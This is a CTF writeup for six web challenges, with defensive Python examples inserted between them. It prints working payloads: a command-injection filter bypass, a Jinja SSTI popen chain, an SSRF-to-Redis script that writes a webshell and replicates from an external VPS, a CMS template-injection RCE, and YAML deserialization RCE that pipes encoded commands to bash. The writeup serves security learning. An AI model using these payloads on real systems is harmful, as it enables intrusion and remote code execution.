1st Xiangyun Cup: web writeups

Gave away a whole day, then in the last 30 seconds watched everyone else rack up points. Mentally wrecked.

Command

My junior solved this one, so I didn't look at it closely:

sort or uniq can be used to read files; the ? wildcard is used in the file name to get around the filter when reading.

  $ip = $_GET['url'];
  if (preg_match("/(;|'| |>|]|&| |\\$|python|sh|nc|tac|rev|more|tailf|index|php|head|nl|tail|less|cat|ruby|perl|bash|rm|cp|mv|\*|\{)/i", $ip)) {
      // rejected (branch body not shown in the writeup)
  } else if (preg_match("/.*f.*l.*a.*g.*/", $ip)) {
      // rejected (branch body not shown in the writeup)
  }
  $a = shell_exec("ping -c 4 " . $ip);

There is no flag in the root directory, so use find to look for it

|find%09/%09-ctime%09-20

[image]

Then read the file

url=asdf||sort%09/etc/.findfla?/fla?.tx?

[image]
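As an added example (not from the writeup), the filter above ported to Python next to the check the challenge should have used: a denylist of shell words lets the tab and wildcard inputs from this section through, while an allow-list that accepts only an IP address literal, combined with running ping without a shell, leaves nothing to bypass. The Python port of the regex and the argv builder are assumptions for this example.

```python
import ipaddress
import re

# The challenge's PHP denylist, ported to Python (constructed for this example).
DENYLIST = re.compile(
    r"(;|'| |>|]|&| |\$|python|sh|nc|tac|rev|more|tailf|index|php|head|nl"
    r"|tail|less|cat|ruby|perl|bash|rm|cp|mv|\*|\{)",
    re.IGNORECASE,
)
FLAG_WORD = re.compile(r".*f.*l.*a.*g.*")


def denylist_allows(value: str) -> bool:
    """True when the challenge's denylist would let the value reach the shell."""
    return not DENYLIST.search(value) and not FLAG_WORD.search(value)


def allowlist_allows(value: str) -> bool:
    """Allow-list check: the parameter must be a literal IPv4/IPv6 address."""
    try:
        ipaddress.ip_address(value)
    except ValueError:
        return False
    return True


def build_ping_argv(value: str) -> list:
    """Build the ping command as an argv list, so no shell ever sees the value."""
    if not allowlist_allows(value):
        raise ValueError("url parameter must be an IP address")
    return ["ping", "-c", "4", value]
```

Run the argv with subprocess.run(argv) rather than shell_exec-style string concatenation; the denylist is then no longer load-bearing.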

flaskbot

First you submit a name, which is base64-encoded and stored in the cookie. Then you enter num, and the bot uses bisection to keep searching for the number you gave: if it is less than 1 the bot wins, otherwise the user wins.

Debugging also shows a render_template_string at the end. Since num is forcibly cast to float, the SSTI has to go through name, and num can be bypassed with nan.

[image]

The following name is enough

{{self.__dict__._TemplateReference__context.lipsum.__globals__["o""s"].__dict__["po""pen"]("cat /super_secret_fl"+"ag.txt").read()}}

[image]
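As an added illustration (not the challenge's code), a bisection bot with constructed rules: the bot wins if one of its integer guesses equals the target within a fixed number of tries. It shows why a NaN that float() happily accepts defeats the bot, since every comparison against NaN is False and the search can never land on a hit, and what a hardened parser for num has to reject.

```python
import math

LIMIT = 2 ** 30 - 1  # constructed search range [0, LIMIT] for this example


def bot_finds_number(target: float, tries: int = 40) -> bool:
    """Constructed bisection game: the bot wins if an integer guess equals the
    target within `tries` (more than the 30 halvings [0, LIMIT] needs)."""
    lo, hi = 0, LIMIT
    for _ in range(tries):
        if lo > hi:
            break
        guess = (lo + hi) // 2
        if guess == target:
            return True
        if target < guess:
            hi = guess - 1
        else:
            # Every comparison with NaN is False, so a NaN target always lands
            # here; the interval collapses and the bot never wins.
            lo = guess + 1
    return False


def parse_num_naive(raw: str) -> float:
    """What float() alone accepts: 'nan', 'inf' and 'infinity' all pass."""
    return float(raw)


def parse_num_strict(raw: str) -> float:
    """Hardened version: finite, whole-number, and inside the game range."""
    value = float(raw)
    if not math.isfinite(value) or not value.is_integer():
        raise ValueError("num must be a finite whole number")
    if not 0 <= value <= LIMIT:
        raise ValueError("num is outside the game range")
    return value
```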

easygogogo

Almost the same as a challenge from the Anheng monthly CTF = =

Any uploaded file gets parsed as txt, so uploading a webshell is pretty much out. After uploading, show displays the base64 encoding of the file and stores it in a cookie.

Since there is filtering, first try uploading a file named ../../../../../flag and save the cookie

[image]

Q/+BAwEBBVVzZXJzAf+CAAEEAQhVc2VybmFtZQEMAAEIUGFzc3dvcmQBDAABCEZpbGVuYW1lAQwAAQRTaWduAQwAAAB0/4IBBWFkbWluAQYxMjM0NTYBPi4vdXBsb2Fkcy80ZTViMDliMjE0OWY3NjE5Y2NhMTU1YzhiZDZkOGVlNS8uLi8uLi8uLi8uLi8uLi9mbGFnASAzNWViNzZmYzhiZDJkYTNlZjYyMTk2ZTkyNTcyOGU3YwA=

Then on a fresh instance, upload any file and swap in that cookie

[image]

[image]

doyouknowssrf

Almost the same as a challenge from GACTF

http://<target>/?url=http://aaa@127.0.0.1:5000@baidu.com/%3Furl=

But loading exp.so here would not give a reverse shell, so in the end I wrote the shell via redis master-slave replication

[image]

Then fire the first payload

import urllib.parse
import requests as rq
vps = "123.57.240.205"
payload1 = f''' HTTP/1.1
AUTH 123456
config set dir /var/www/html
config set dbfilename wander.php
slaveof {vps} 6666
foo: '''
payload2 = f''' HTTP/1.1
AUTH 123456
slaveof no one
quit
foo: '''
def exp(payload):
    payload = urllib.parse.quote(payload).replace("%0A", "%0D%0A")
    payload = "?url=http://127.0.0.1:6379/" + payload
    payload = urllib.parse.quote(payload)
    payload = "?url=http://foo@127.0.0.1:5000%20@www.baidu.com/" + payload
    print(payload)
exp(payload1)
exp(payload2)

[image]

[image]
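Added example, not part of the writeup: the `aaa@127.0.0.1:5000@baidu.com` authority is read differently by different parsers, so an SSRF check that only looks at the parsed hostname can be fooled while the fetching library connects elsewhere. The validator below is a constructed one (names are mine): it rejects userinfo, whitespace or percent-encoding in the authority, restricts ports, and requires the host to resolve to a globally routable address; the resolver is injectable so the check runs offline.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_PORTS = (None, 80, 443)


def parsed_hostname(url: str):
    """What a check based only on urlsplit().hostname would see."""
    return urlsplit(url).hostname


def is_safe_url(url: str, resolver=socket.gethostbyname) -> bool:
    """Reject URLs that could reach internal services.

    `resolver` maps a host name to an IP string; it is injectable so the check
    can run offline (this validator is a constructed example, not the app's).
    """
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False
    netloc = parts.netloc
    # A plain host[:port] never needs userinfo, percent-encoding or whitespace;
    # all three are the ingredients of the parser-confusion payload above.
    if "@" in netloc or "%" in netloc or any(c.isspace() for c in netloc):
        return False
    try:
        port = parts.port
    except ValueError:
        return False
    if port not in ALLOWED_PORTS or not parts.hostname:
        return False
    try:
        ip = ipaddress.ip_address(parts.hostname)
    except ValueError:
        try:
            ip = ipaddress.ip_address(resolver(parts.hostname))
        except (OSError, ValueError):
            return False
    # Loopback, RFC 1918, link-local and other special ranges are not global.
    return ip.is_global
```

Connect to the address that was checked rather than resolving the name a second time, otherwise a DNS answer that changes between check and fetch undoes the validation.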

easyzzz

This one was pretty ridiculous too: it says code audit but gives no source code or anything. So, go hunt for the version...?

Find the admin panel, by brute force or by looking for leaked information

/plugins/webuploader/js/webconfig.php

[image]

The admin path turns out to be admin539. SQL injection attempts went nowhere; dictionary brute-forcing the password gives fuzzy9inve

[image]

After logging in to the admin panel, modify a template to get a shell

https://xz.aliyun.com/t/7414

Here, edit search.html directly, then go to the search route

{if:1=1);echo `cat /fla*`;//}{end if}

[image]

[image]

profile

yaml/yml file upload

Uploaded files can be downloaded; try viewing app.py

http://eci-2zeis362pdxn0bqvp7s4.cloudeci1.ichunqiu.com:8888/uploads/4e5b09b2149f7619cca155c8bd6d8ee5/..%2F..%2Fapp.py

Source code

from flask import Flask, render_template, request, flash, redirect, send_file,session
import os
import re
from hashlib import md5
import yaml
app = Flask(__name__)
app.config['UPLOAD_FOLDER'] = os.path.join(os.curdir, "uploads")
app.config['SECRET_KEY'] = 'Th1s_is_A_Sup333er_s1cret_k1yyyyy'
ALLOWED_EXTENSIONS = {'yaml','yml'}
def allowed_file(filename):
    return '.' in filename and filename.rsplit('.', 1)[1].lower()
@app.route("/")
def index():
    session['priviledge'] = 'guest'
    return render_template("home.html")
@app.route("/upload", methods=["POST"])
def upload():
    file = request.files["file"]
    if file.filename == '':
        flash('No selected file')
        return redirect("/")
    elif not (allowed_file(file.filename) in ALLOWED_EXTENSIONS):
        flash('Please upload yaml/yml only.')
        return redirect("/")
    else:
        dirname = md5(request.remote_addr.encode()).hexdigest()
        filename = file.filename
        session['filename'] = filename 
        upload_directory = os.path.join(app.config['UPLOAD_FOLDER'], dirname)
        if not os.path.exists(upload_directory):
            os.mkdir(upload_directory)
        upload_path = os.path.join(app.config['UPLOAD_FOLDER'], dirname, filename)
        file.save(upload_path)
        return render_template("uploaded.html",path = os.path.join(dirname, filename))
@app.route("/uploads/<path:path>")
def uploads(path):
    return send_file(os.path.join(app.config['UPLOAD_FOLDER'], path))
@app.route("/view")
def view():
    dirname = md5(request.remote_addr.encode()).hexdigest()
    realpath = os.path.join(app.config['UPLOAD_FOLDER'], dirname,session['filename']).replace('..','')
    if session['priviledge'] =='elite' and os.path.isfile(realpath):
        try:
            with open(realpath,'rb') as f:
                data = f.read()
                if not re.fullmatch(b"^[ -\-/-\]a-}\n]*$",data, flags=re.MULTILINE):
                    info = {'user': 'elite-user'}
                    flash('Sth weird...')
                else:
                    info = yaml.load(data)
                if info['user'] == 'Administrator':
                    flash('Welcome admin!')
                else:
                    raise ()
        except:
            info = {'user': 'elite-user'}
    else:
        info = {'user': 'guest'}
    return render_template("view.html",user = info['user'])
if __name__ == "__main__":
    app.run('0.0.0.0',port=8888,threaded=True)
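The easygogogo cookie above and this app's /uploads route and view() all trust a user-controlled path fragment (view() only strips the string '..', which is not a containment check). As an added example (not the app's code), here is what the app's join does with the `../../app.py` path from this writeup, next to a realpath-based containment check that rejects it and the `../../../../../flag` name from easygogogo; UPLOAD_FOLDER is a constructed value.

```python
import os

UPLOAD_FOLDER = "/srv/app/uploads"  # constructed base directory for this example


def uploads_route_path(path: str) -> str:
    """Mirrors the app's /uploads/<path:path> handler: join with no check.
    normpath shows the path the OS will actually open."""
    return os.path.normpath(os.path.join(UPLOAD_FOLDER, path))


def safe_join(base: str, user_path: str):
    """Return the absolute target if it stays inside `base`, else None."""
    if "\x00" in user_path or os.path.isabs(user_path):
        return None
    base_real = os.path.realpath(base)
    target = os.path.realpath(os.path.join(base_real, user_path))
    # commonpath (not startswith) so '/srv/app/uploads2' does not count as inside
    if os.path.commonpath([base_real, target]) != base_real:
        return None
    return target
```

The same check belongs in view(), applied to session['filename'] before open(), in place of the '..' replace.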

After obtaining the secret key, forge the session

[image]

This way the uploaded yaml goes through yaml.load, which triggers YAML deserialization, but only if it matches the regex, i.e. these characters cannot be used:

. _ `

Reference: https://hackmd.io/@harrier/uiuctf20

Bypass with \x hex escapes. Tried exfiltrating out-of-band, but there seems to be no outbound network, so try writing into the upload directory instead

!!python/object/new:type
args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
listitems: "\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x6f\x73\x27\x29\x2e\x73\x79\x73\x74\x65\x6d\x28\x27\x2f\x72\x65\x61\x64\x66\x6c\x61\x67\x20\x3e\x20\x2e\x2f\x75\x70\x6c\x6f\x61\x64\x73\x2f\x34\x65\x35\x62\x30\x39\x62\x32\x31\x34\x39\x66\x37\x36\x31\x39\x63\x63\x61\x31\x35\x35\x63\x38\x62\x64\x36\x64\x38\x65\x65\x35\x2f\x33\x32\x31\x27\x29"

The hex decodes to

__import__('os').system('/readflag > ./uploads/4e5b09b2149f7619cca155c8bd6d8ee5/321

Then download the file under uploads

[image]
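Added example (not the app's code): the fullmatch regex from view() runs over the raw bytes, so it only ever sees backslash, x and hex digits, while the YAML parser decodes \xNN escapes afterwards. The helper below decodes that one escape form (a constructed subset of YAML's escape rules) to show the post-decoding check that would have caught the `_` characters; the actual fix is yaml.safe_load, which refuses python/object tags altogether.

```python
import re

# The byte-level allow-list from the writeup's app.py (same pattern, raw bytes).
RAW_FILTER = re.compile(rb"^[ -\-/-\]a-}\n]*$", flags=re.MULTILINE)
# Characters the class leaves out: '.', '^', '_', '`' and '~'.
FORBIDDEN = set("._`^~")
HEX_ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{2})")


def raw_filter_passes(data: bytes) -> bool:
    """What the app checks: the undecoded bytes of the uploaded document."""
    return RAW_FILTER.fullmatch(data) is not None


def decode_dq_hex(scalar: str) -> str:
    """Decode \\xNN escapes of a YAML double-quoted scalar (constructed helper
    covering only this escape form, not YAML's full escape set)."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), scalar)


def decoded_is_clean(scalar: str) -> bool:
    """The check the app needed: apply the policy after decoding, not before."""
    return not (FORBIDDEN & set(decode_dq_hex(scalar)))
```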

Locally this works, but remotely it just would not, damn it

!!python/object/apply:eval ["from os import system;system('echo d2hvYW1pID4gLi91cGxvYWRzLzRlNWIwOWIyMTQ5Zjc2MTljY2ExNTVjOGJkNmQ4ZWU1LzIyMw==|base64 -d|bash')"]